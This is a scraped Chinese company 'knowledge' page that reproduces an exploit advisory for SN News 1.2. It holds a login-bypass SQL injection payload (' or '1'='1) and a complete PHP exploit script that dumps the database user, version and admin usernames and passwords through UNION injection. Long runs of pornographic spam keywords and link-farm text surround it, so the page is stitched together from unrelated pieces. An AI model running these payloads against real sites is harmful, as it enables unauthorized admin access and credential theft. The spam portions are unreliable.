男人吃奶摸下挵进去好爽,日日躁夜夜躁狠狠躁,freesexvide0s性欧美高清,高清freexxxx性国产,无码人妻一区二区三区一,乱人伦中文字幕成人网站在线,亚洲欧美综合一区二区三区 ,神马影院在线视频观看
知識學(xué)堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時手機(jī):13896886023
  • ·QQ 咨 詢:361652718 513960520
當(dāng)前位置 > 首頁 > 知識學(xué)堂 > 常見技術(shù)問題
SN News <= 1.2管理權(quán)限驗證繞過及注射
更新時間:2012-06-15 | 發(fā)布人:本站 | 點擊率:681
SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability 
 
影響版本 1.2 
 
下載地址: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news 
     作者不為任何危害負(fù)責(zé)
 
############################################################################## 
 
## 缺陷位于- /admin/logar.php [4-15]: 
 
4.$login = $_POST["login"]; 
 
5.$senha = $_POST["senha"]; 
 
6.$sql   = "select * from news_adm where login='$login' AND senha='$senha'"; 
 
7.$query = mysql_query($sql); 
 
8.$nr    = mysql_num_rows($query); 
 
9.if($nr>0){ 
 
10.$_SESSION["admin"] = "on"; 
 
11.echo "<script> 
 
12.location.href='../' 
 
13.</script> 
 
14."; 
 
15.} 
 
## 注釋: 
 
## As you can see there is no validation or any filter to variables $login and $senha. 
 
## See line 6, so you can inject sql query by using $login and $senha variables. 
 
## SQL Injection PoC: 
 
## http://www.xxx.com /sn_news/admin/login.htm 
 
## Login: ' or '1'='1 
 
## Senha: ' or '1'='1 
 
## This injection will bypass the admin login screen. 
 
 
 
 
 
 
 
 # 標(biāo)題: SN News <= 1.2 SQL Injection 
 
 
 
 
<?php 
 
/* 
 示例: 
 
$ php mnews.php http://www.xxx.com /scripts/mnews/ 
 
  
 
*/
 
  
 
error_reporting(E_ERROR); 
 
set_time_limit(0); 
 
@ini_set("default_socket_timeout", 30); 
 
   
 
function hex($string){ 
 
    $hex=''; // PHP 'Dim' =] 
 
    for ($i=0; $i < strlen($string); $i++){ 
 
        $hex .= dechex(ord($string[$i])); 
 
    } 
 
    return '0x'.$hex; 
 
 
  
 
  
 
echo "\nSN News <= 1.2 SQL Injection exploit\n"; 
 
echo "Discovered and written by WhiteCollarGroup\n"; 
 
echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com\n\n"; 
 
  
 
if($argc!=2) { 
 
    echo "Usage: \n"; 
 
    echo "php $argv[0] <target url>\n"; 
 
    echo "Example:\n"; 
 
    echo "php $argv[0] http://www.website.com/snnews\n"; 
 
    exit; 
 
 
  
 
$target = $argv[1]; 
 
if(substr($target, (strlen($target)-1))!="/") { 
 
    $target .= "/"; 
 
 
$inject = $target . "visualiza.php?id=-0'%20"; 
 
  
 
$token = uniqid(); 
 
$token_hex = hex($token); 
 
  
 
echo "[*] Trying to get informations...\n"; 
 
$infos = file_get_contents($inject.urlencode("union all select 1,concat(".$token_hex.", user(), ".$token_hex.", version(), ".$token_hex."),3,4,5-- ")); 
 
$infos_r = array(); 
 
preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r); 
 
$user = $infos_r[1][0]; 
 
$version = $infos_r[2][0]; 
if($user) { 
 
    echo "[*] MySQL version: $version\n"; 
 
    echo "[*] MySQL user: $user\n"; 
 
} else { 
 
    echo "[-] Error while getting informations.\n"; 
 
 
  
 
echo "[*] Getting users...\n"; 
 
$i = 0; 
 
while(true) { 
 
    $dados_r = array(); 
 
    $dados = file_get_contents($inject.urlencode("union all select 1,concat(".$token_hex.", login, ".$token_hex.", senha, ".$token_hex."),3,4,5 from news_adm limit $i,1-- ")); 
 
    preg_match_all("/$token(.*)$token(.*)$token/", $dados, $dados_r); 
 
    $login = $dados_r[1][0]; 
 
    $senha = $dados_r[2][0]; 
 
    if(($login) AND ($senha)) { 
 
        echo "-+-\n"; 
 
        echo "User: $login\n"; 
 
        echo "Pass: $senha\n"; 
 
    } else { 
 
        break; 
 
    } 
 
    $i++; 
 
 
  
 
echo "-+-+-\n"; 
 
if($i!=0) { 
 
    echo "[!] Admin login: {$target}admin/\n"; 
 
} else { 
 
    echo "[-] Exploit failed. Make sure that's server is using a valid version of SN News without Apache mod_security.\nWe're sorry."; 
 
 
echo "\n";
分享到: QQ空間 新浪微博 開心網(wǎng) 人人網(wǎng)
主站蜘蛛池模板: 久久精品国产亚洲av电影网| a毛片免费全部播放| cijilu在线视频| 国产97色在线 | 免| 久久男人av资源网站无码软件| 少妇人妻88久久中文字幕| 天堂网www资源在线| 中文无码熟妇人妻av在线| 国产成人精品久久一区二区三区 | 丰满少妇大力进入av亚洲| av无码精品一区二区三区| 精品香蕉久久久午夜福利| 17岁日本免费bd完整版观看| 成全我在线观看免费第二季| 欧美成人免费全部观看| 特级欧美aaaaaa片| 国产肥白大熟妇bbbb视频| 色噜噜狠狠一区二区三区| 无码人妻aⅴ一区二区三区有奶水| y111111少妇影院无码| 免费男人和女人牲交视频全黄| 青草视频在线观看| 国产免费视频| 国产女人高潮抽搐叫床视频| 午夜电影| 色翁荡息又大又硬又粗又视频图片| 99精品国产一区二区三区| 综合一区无套内射中文字幕| 一个人免费观看视频www高清| 高潮毛片无遮挡高清视频播放| 亚洲精品宾馆在线精品酒店| gogogo高清免费看韩国| 国产欧美日韩专区发布| 亚洲伊人久久综合影院| 久久男人av资源网站无码软件| 熟熟熟熟熟熟熟熟妇50岁| 狠狠色丁香婷婷久久综合| 久久亚洲av永久无码精品| 国产精品一区二区av| 国产精品午夜福利在线观看| 亚洲欧洲日产国码久在线|